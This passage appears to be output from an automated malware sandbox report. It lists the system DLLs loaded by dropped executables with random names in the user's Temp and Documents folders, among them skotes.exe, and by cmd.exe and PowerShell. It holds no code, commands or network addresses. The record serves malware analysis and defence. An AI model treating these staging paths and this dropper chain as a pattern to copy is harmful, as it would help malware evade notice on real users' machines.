                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: wtsapi32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: winsta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: explorerframe.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: rasapi32.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: rasman.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: rtutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: secur32.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: msasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: gpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: webio.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: msasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: gpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: dpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: amsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: webio.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: msasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: gpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: dpapi.dll
